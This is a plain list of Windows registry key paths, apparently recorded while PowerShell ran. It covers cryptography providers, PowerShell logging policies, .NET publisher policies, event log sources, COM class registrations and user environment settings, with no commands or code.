
                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{000C10F1-0000-0000-C000-000000000046}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{06C9E010-38CE-11D4-A2A3-00104BD35090}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1A610570-38CE-11D4-A2A3-00104BD35090}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptSIPDllIsMyFileType2

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{000C10F1-0000-0000-C000-000000000046}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptSIPDllPutSignedDataMsg

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{000C10F1-0000-0000-C000-000000000046}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptSIPDllGetSignedDataMsg

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.JScript__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.JScript__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Data.SqlXml__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Data.SqlXml__b77a5c561934e089

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time\Dynamic DST

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Caching__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Caching__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.EnterpriseServices__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.EnterpriseServices__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment

                
                HKEY_CURRENT_USER\Environment

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.Security__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.Security__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\PowerShell

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\HardwareEvents

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\HardwareEvents\PowerShell

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Internet Explorer

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Internet Explorer\PowerShell

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Key Management Service

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Key Management Service\PowerShell

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Media Center

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Media Center\PowerShell

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\OAlerts

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\OAlerts\PowerShell

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Security

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Security\PowerShell

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\PowerShell

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Windows PowerShell

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Windows PowerShell\PowerShell

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax

                
                HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax

                
                HKEY_CURRENT_USER\Control Panel\International

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Dynamic__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Dynamic__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds

                
                HKEY_CURRENT_USER\Software\Classes\AppID\Powershell.exe

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Web.Extensions__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Web.Extensions__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Web__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Web__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.Commands.Utility.resources_en-US_31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.Commands.Utility.resources_en-US_31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.ServiceProcess__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.ServiceProcess__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.WSMan.Management__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.WSMan.Management__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Web.Services__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Web.Services__b03f5f7f11d50a3a

                
                HKEY_CLASSES_ROOT\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

                
                HKEY_CLASSES_ROOT\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid

                
                HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid

                
                HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_CLASSES\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\TreatAs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\TreatAs

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\ProgID\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\AppID

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_CLASSES\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LocalService

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\DllSurrogate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RunAs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ActivateAtStorage

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ROTFlags

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AppIDFlags

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LaunchPermission

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\OLE

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AuthenticationLevel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RemoteServerName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\SRPTrustLevel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\PreferredServerBitness

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000_Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\LocalServer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Elevation

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1381398318-3211537236-2227685884-1000\ProfileImagePath

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Environment

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Volatile Environment

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Volatile Environment\0

                
